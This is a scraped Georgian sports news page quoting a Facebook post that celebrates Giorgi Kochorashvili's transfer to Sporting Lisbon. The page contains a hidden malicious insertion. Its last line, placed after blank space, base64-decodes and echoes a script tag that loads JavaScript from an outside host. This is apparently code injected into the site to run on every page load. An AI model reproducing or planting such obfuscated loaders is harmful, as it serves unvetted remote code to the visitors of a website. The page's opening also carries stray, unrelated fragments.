global distribution
გარე ავეჯი
"გიორგი ქოჩორაშვილი: გმირობისთვის ანთებული მწვანე შუქი - ამ სათაურით პოსტს წერს საფეხბურთო სივრცის გვერდი "ჩიტადელა", რომელიც ზაფხულის ერთ-ერთი მთავარ სიახლეს - კაპიტანი საქართველოს ტრანსფერს „სპორტინგში“ ეხმაურება. 
კაპიტანი საქართველოს ტრანსფერი „სპორტინგში“ — ზაფხულის ერთ-ერთი მთავარი სიახლეა.
ეს უბრალოდ ტრანსფერი არ არის. ეს არის გონებითა და გულით მიღებული გადაწყვეტილება, რომელიც დიდ გავლენას მოახდენს გიორგის კარიერაზე.
ქოჩორაშვილმა ბოლო წლებში შთამბეჭდავი პროგრესი განიცადა და ევროპული ფეხბურთის კარები მძლავრად და მრისხანეთ შეამტვრია. მისი ლიდერული თვისებები და ნამდვილი მეომრის ხასიათი შესანიშნავად აისახება სათამაშო სტილში.
ის არ არის კროოსი, მოდრიჩი ან პირლო. არც კანტე ან კაზემირო.
კაპიტანი საქართველო — უნიკალურია.
მოედნის ხედვა, სათამაშო ინტელექტი და შრომისმოყვარეობა თავმდაბლობასთანაა შერწყმული. ეს კომბინაცია კი მეტოქე გუნდებისთვის სერიოზული თავსატეხია.
„სპორტინგი“ უბრალოდ კლუბი არ არის — აქ დაიბადა საფეხბურთო მონსტრი: კრიშტიანუ რონალდუ.
ლისაბონში კარგად იციან, როგორ აქციონ კარგი ფეხბურთელი სუპერვარსკვლავად.
ქოჩორაშვილს კი ყველაფერი აქვს იმისთვის, რომ საფეხბურთო მწვერვალისკენ მიმავალ გზაზე კიდევ ერთი დიდი ნაბიჯი გადადგას.
ქართული ხასიათი პორტუგალიაში — როგორც არწივი ცაში.
კაპიტანი საქართველო მზად არის გახდეს ლისაბონის ახალი გმირი. მწვანე შუქი უკვე ანთებულია", - აღნიშნულია "ჩიტადელას" FACEBOOK გვერდზე ,.
ChatGPT Image Jul 9 2025 06 02 53 PM min
 
 
 
 
 
 
104
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");